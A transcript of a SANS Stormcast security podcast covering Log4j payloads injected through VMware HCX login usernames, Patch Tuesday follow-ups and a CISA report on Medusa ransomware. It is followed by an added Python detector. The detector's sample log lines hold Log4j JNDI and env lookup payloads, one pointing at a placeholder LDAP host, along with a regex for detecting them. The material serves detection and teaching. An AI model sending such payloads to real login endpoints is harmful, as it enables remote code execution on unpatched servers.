Hello and welcome to the Thursday, March 13th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida.

One vulnerability that's just not going away is Log4j. The latest example is some scans that I observed today against the VMware Hybrid Cloud Extension, or HCX, API. This is a REST API, and at first I thought it was just a brute force attempt I saw, because the endpoint that the request was directed at, well, was used for login. It's the session endpoint, and you just post a username and password to it and you'll get back a session key that's then being used as a bearer token. However, looking at the payload closer, well, the username was actually a Log4j payload. This makes perfect sense, sort of in hindsight, that an attacker would use a username to inject a Log4j payload because, well, that's the part that's usually logged from a request like this. And interestingly, the IP that was going after these VMware systems also went after a couple other login pages, like some Cisco login pages and others that I have yet to identify. They're sort of just generic, like some just say login. So it could be various applications that are being attacked here.

And then we got a little bit of Patch Tuesday cleanup. First of all, the Apple update released yesterday that fixed the zero-day vulnerability in macOS and iOS. Apparently, after applying this update, some users reported that Apple Intelligence is being re-enabled if they had it disabled first. That's Apple's artificial intelligence feature that typically is enabled by default, but you are able to disable it. Well, in Europe, I don't think it's available, so no issue with Europe here. This has been an issue in the last update as well, so nothing really terribly new here. Just be aware, and if you want it disabled, double-check that it's still disabled.

Nothing yet I heard about yesterday's Microsoft update, but there are some reports that actually the January update does cause some issues with USB printers, and it does cause them to print gibberish. If you're affected by this, I'll have a link to a statement from Microsoft here in the show notes.

And yesterday when I was recording, Adobe had not released its Patch Tuesday update yet. Well, they have been released now. They updated a total of seven different applications. The one that's noteworthy here is Acrobat Reader. Of course, that's an old favorite when it comes to patching, and it fixes a number of critical remote code execution vulnerabilities. So definitely something that you need to apply if you're running Adobe Acrobat Reader.

And CISA, in conjunction with some partner agencies, did publish a report about the Medusa malware. This is a ransomware. I'm always looking first for sort of initial access. In this case, it appears to be phishing, of course, still very common; ScreenConnect, we talked about this before; and then the Fortinet EMS SQL injection vulnerability. Another sort of interesting TTP here I find is that they see it do some port scans internally. That's something that should sort of pop up in any kind of internal sensor, in particular some of the odd ports they're scanning, like 3050, the Firebird database port, which isn't used much. So having all of a sudden lots of SYN scans on this port should be something that could trigger an alert. Other than that, a great read as usual. These reports are very useful to, first of all, make sure that you have blocked some of these initial access vectors as much as possible, that you have set up detection for the lateral movement, like these port scans, and then, of course, also just to check if you're not already infected. There are a number of IOCs and such listed in the report.

And then let's look at some other patches. We got, first of all, Zoom released an update fixing five vulnerabilities. Four of them are rated as high, meaning they lead to remote code execution: buffer overflows, buffer underflow, use after free. Sort of your standard vulnerabilities here. Updated. I find Zoom is pretty good in sort of keeping itself updated, so it shouldn't be a big issue. And then we got an update for the FreeType library. This is one of those font rendering libraries. Plenty of past vulnerabilities in libraries like this. This could lead to remote code execution. Problem with all these libraries is that, number one, they're everywhere, so you'll have to wait for things like browsers and other display software to be updated. Secondly, there are a lot of fonts being loaded sort of dynamically these days, and that's how a vulnerability like this could possibly be exploited.

Well, and this is it again for today. Thanks for subscribing. Thanks for leaving good reviews. Thanks for telling everybody, friends and enemies, how great this podcast is, and get them to subscribe to it as well. Thanks and talk to you again tomorrow. Bye.
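An added example, not from the podcast or from VMware: a small Python detector that scans constructed JSON login records for Log4j lookup syntax in the credential fields (the username trick described above) and correlates which sources are hitting several different login endpoints. The record format, the field names and the /api/sessions path are assumptions, not taken from the episode.

```python
import json
import re
from collections import defaultdict

# Log4j lookup syntax is "${<prefix>:...}". No legitimate username or password
# contains it, so any match is suspicious; the "jndi" prefix is the Log4Shell case.
LOOKUP_RE = re.compile(r"\$\{\s*([a-zA-Z]+)\s*:")
CREDENTIAL_FIELDS = ("username", "password")

# Constructed sample records (one JSON object per line), in an assumed log format
# where the login endpoint logs the posted credentials. Not real traffic.
SAMPLE_LOG = r'''
{"src":"203.0.113.7","path":"/api/sessions","username":"${jndi:ldap://203.0.113.9/a}","password":"x"}
{"src":"203.0.113.7","path":"/login","username":"${jndi:ldap://203.0.113.9/a}","password":"x"}
{"src":"198.51.100.4","path":"/api/sessions","username":"admin","password":"Winter2025!"}
{"src":"203.0.113.7","path":"/vpn/login","username":"${env:USER}","password":"x"}
'''.strip()

def classify_lookup(value):
    """Return (severity, prefix) if the value carries a lookup, else None."""
    m = LOOKUP_RE.search(value or "")
    if not m:
        return None
    prefix = m.group(1).lower()
    return ("critical" if prefix == "jndi" else "suspicious", prefix)

def scan_login_log(text):
    """Parse JSON login records; return alerts and the login paths seen per source."""
    alerts = []
    paths_by_src = defaultdict(set)
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        paths_by_src[rec["src"]].add(rec["path"])
        for field in CREDENTIAL_FIELDS:
            hit = classify_lookup(rec.get(field))
            if hit:
                alerts.append({"src": rec["src"], "path": rec["path"], "field": field,
                               "severity": hit[0], "prefix": hit[1]})
    return alerts, paths_by_src

def sources_spraying_logins(paths_by_src, min_paths=2):
    """Sources that hit several distinct login endpoints, the pattern noted in the episode."""
    return sorted(src for src, paths in paths_by_src.items() if len(paths) >= min_paths)

if __name__ == "__main__":
    found, per_src = scan_login_log(SAMPLE_LOG)
    print(len(found), "alerts;", "spraying sources:", sources_spraying_logins(per_src))
```

Any hit at all in a credential field is worth an alert, since the only reason such a string reaches a login endpoint is to be logged; the jndi case is the one to treat as critical.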